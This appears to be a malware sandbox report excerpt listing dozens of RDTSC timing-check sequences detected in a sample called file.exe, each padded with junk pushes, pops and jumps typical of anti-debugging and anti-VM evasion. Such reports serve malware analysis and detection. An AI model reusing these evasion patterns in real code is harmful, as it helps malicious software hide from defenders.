                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1039353 second address: 1039358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC358 second address: FAC35C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038D64 second address: 1038D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6C14B92236h 0x0000000a pop eax 0x0000000b push edi 0x0000000c jno 00007F6C14B92236h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038EAF second address: 1038EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038EB5 second address: 1038EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DD23 second address: 103DD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10402CA second address: 10402EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6C14B9223Ch 0x0000000a popad 0x0000000b jc 00007F6C14B9227Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jnl 00007F6C14B92236h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104047A second address: 1040480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040480 second address: 1040484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040484 second address: 104048A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10408F6 second address: 1040900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6C14B92236h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046EE9 second address: 1046EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046EF7 second address: 1046F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92244h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046F0F second address: 1046F19 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C1537B646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046F19 second address: 1046F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6C14B92238h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045B0D second address: 1045B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0162 second address: FF0169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DD21 second address: 104DD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DD27 second address: 104DD2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104BE84 second address: 104BE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C6AA second address: 104C6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C9E5 second address: 104C9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CC67 second address: 104CC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F6C14B92236h 0x00000010 jno 00007F6C14B92236h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CC7E second address: 104CC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CC86 second address: 104CC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104CC8A second address: 104CCA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F6C1537B646h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D4D2 second address: 104D4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D4E4 second address: 104D4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6C1537B646h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D4F0 second address: 104D4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D4F4 second address: 104D4F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D4F8 second address: 104D50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnc 00007F6C14B92236h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051AFA second address: 1051B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051C60 second address: 1051C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92244h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051C79 second address: 1051C7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051C7E second address: 1051CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007F6C14B9223Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jg 00007F6C14B92236h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jo 00007F6C14B92236h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051CA0 second address: 1051CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051CA4 second address: 1051CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C14B92244h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051E1F second address: 1051E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1051E25 second address: 1051E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F6C14B9223Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C563 second address: 105C568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC1E second address: 105CC43 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C14B9223Ch 0x00000008 jmp 00007F6C14B9223Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC43 second address: 105CC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC47 second address: 105CC6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6C14B9224Fh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F6C14B92247h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CDFE second address: 105CE06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D2BC second address: 105D2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007F6C14B92236h 0x0000000c jmp 00007F6C14B92248h 0x00000011 popad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F6C14B92241h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E16D second address: 105E17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 jnc 00007F6C1537B646h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E17D second address: 105E185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BF5A second address: 105BF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6C1537B651h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10652FC second address: 1065300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065494 second address: 10654AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B655h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10654AD second address: 10654B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB641D second address: FB6421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F67 second address: 1075F80 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C14B92236h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F6C14B92236h 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B739 second address: 107B73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B73D second address: 107B741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2B3 second address: 107B2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2B9 second address: 107B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2BD second address: 107B2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2C3 second address: 107B2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B2C9 second address: 107B2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080342 second address: 108034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1085F95 second address: 1085F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108E5A8 second address: 108E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950D1 second address: 10950E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B650h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950E5 second address: 10950E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10950E9 second address: 109510E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C1537B654h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F6C1537B646h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109510E second address: 1095126 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C14B92242h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095126 second address: 1095144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F6C1537B646h 0x00000009 jng 00007F6C1537B646h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 jmp 00007F6C1537B64Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109555A second address: 109555F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109555F second address: 109556B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C1537B646h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109556B second address: 109556F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109556F second address: 109558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F6C1537B673h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6C1537B64Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095ADE second address: 1095AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AE2 second address: 1095AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AEE second address: 1095AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095AF2 second address: 1095B04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F6C1537B646h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A099 second address: 109A0C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F6C14B92236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C14B92242h 0x00000013 jmp 00007F6C14B9223Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A0C6 second address: 109A0CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A0CC second address: 109A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6C14B92249h 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F6C14B92249h 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A111 second address: 109A115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A115 second address: 109A129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F6C14B92236h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A129 second address: 109A141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B651h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099BF8 second address: 1099BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099BFC second address: 1099C0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099C0A second address: 1099C3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6C14B9224Bh 0x0000000c jmp 00007F6C14B92245h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C14B92241h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099C3E second address: 1099C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099DB9 second address: 1099DC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C580 second address: 109C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C584 second address: 109C58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C58A second address: 109C5A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B64Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109C5A0 second address: 109C5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5586 second address: 10A558C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A558C second address: 10A559D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6C14B92236h 0x00000009 jp 00007F6C14B92236h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7991 second address: 10B799E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B799E second address: 10B79A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B90D8 second address: 10B90EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6C1537B646h 0x0000000a jmp 00007F6C1537B64Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8466 second address: 10C846C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C846C second address: 10C849D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6C1537B650h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F6C1537B658h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C849D second address: 10C84B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84B3 second address: 10C84D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C1537B646h 0x00000008 jmp 00007F6C1537B650h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 je 00007F6C1537B64Eh 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84D9 second address: 10C84F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6C14B92245h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C84F6 second address: 10C84FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8690 second address: 10C86A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B9223Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C86A5 second address: 10C86CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6C1537B646h 0x0000000a jmp 00007F6C1537B64Ah 0x0000000f popad 0x00000010 push ecx 0x00000011 jl 00007F6C1537B646h 0x00000017 pop ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F6C1537B648h 0x00000021 rdtsc
